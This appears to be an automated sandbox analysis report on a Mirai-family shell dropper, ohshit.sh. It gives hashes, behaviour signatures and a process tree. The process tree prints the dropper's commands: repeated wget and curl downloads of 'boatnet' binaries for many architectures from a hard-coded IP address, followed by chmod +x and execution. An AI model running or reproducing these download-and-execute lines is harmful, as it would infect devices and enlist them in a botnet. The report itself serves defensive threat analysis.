Analysis
-
max time kernel
119s -
max time network
138s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
23-12-2024 05:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
ohshit.sh
-
Size
3KB
-
MD5
e0ccd217979419469e913cbef10872f3
-
SHA1
6bbef022dcf450af81bee90522e4c82069c84064
-
SHA256
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71
-
SHA512
38402719e384396071ab1f779eb0d67a55570ecfb04018e47cafdfd73ce04984e15c0d2942b446cee5652a449e22a8690812dbe5fd232736cb8a3939531255ce
Malware Config
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 840 chmod 846 chmod 715 chmod 810 chmod 816 chmod 828 chmod 834 chmod 726 chmod 822 chmod 852 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/WTF 717 WTF /tmp/WTF 727 WTF /tmp/WTF 811 WTF /tmp/WTF 817 WTF /tmp/WTF 823 WTF /tmp/WTF 829 WTF /tmp/WTF 835 WTF /tmp/WTF 841 WTF /tmp/WTF 847 WTF /tmp/WTF 853 WTF -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 725 cat 720 wget 724 curl -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:690 -
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:693
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/catcat boatnet.x862⤵PID:714
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hyoMq6 WTF2⤵
- File and Directory Permissions Modification
PID:715
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:717
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:725
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hyoMq6 WTF2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:727
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:729
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/catcat boatnet.arc2⤵PID:809
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:811
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵PID:813
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
PID:814
-
-
/bin/catcat boatnet.i4682⤵PID:815
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:817
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵PID:819
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
PID:820
-
-
/bin/catcat boatnet.i6862⤵PID:821
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:823
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵PID:825
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
PID:826
-
-
/bin/catcat boatnet.x86_642⤵PID:827
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:829
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵PID:831
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
PID:832
-
-
/bin/catcat boatnet.mpsl2⤵PID:833
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:835
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵PID:837
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵
- Reads runtime system information
PID:838
-
-
/bin/catcat boatnet.arm2⤵PID:839
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:841
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵PID:843
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵
- Reads runtime system information
PID:844
-
-
/bin/catcat boatnet.arm52⤵PID:845
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:847
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵PID:849
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
PID:850
-
-
/bin/catcat boatnet.arm62⤵PID:851
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:853
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵PID:856
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5366837c461677cb1b37924604fe50564
SHA1ce442f4c57322b7dbafcaebd37cb0ee531d0ea4d
SHA256c28510d75f73788f786fb0e5f14f3b7d6e349e0eeaa5922c6743be66824b4c4f
SHA5124434b96a2931b0bbf39863cecd0c924e64e8d051b9277ae7a86ed151d60bdebfaf2f7b749ec6cad8a41000a3acb268adaea9f42868f5617a52f8053efad79840
-
Filesize
52KB
MD5cf56a03f39c0ac7e03aabe15d922fc0b
SHA1b9f1e8965b62a7b533088c70b3a116fd56e15d79
SHA25662de02aca0b8cfedf3148ce1d30e8f1ff42d9b42aadd15003e1248c2a483cc0c
SHA5120938b7f67f6528dc169cb2b23799a45a926d3f1522049ca3e669aafb697a06cfc7cb97188517f5934187360ad3969011d89d4503a7bf3d5e6685cfdf8c6e97b4
-
Filesize
20KB
MD5cfdee595514f89c9e1ca4c3c26837bb6
SHA1726f957189f0ce2da9008987aaa7f51453ede884
SHA2564940c3107a34d4b65f81e5e5e7a54f31fce9417fe74d18dd6e6b104d07197a3d
SHA51207cd565d04eeef92d3bf0613413d2c63bc045d6093bb048118b3f80254701c9aaef7dac444dc39ced7c2297754d7dbe1da4f808a6e2e87727f9272b436fea226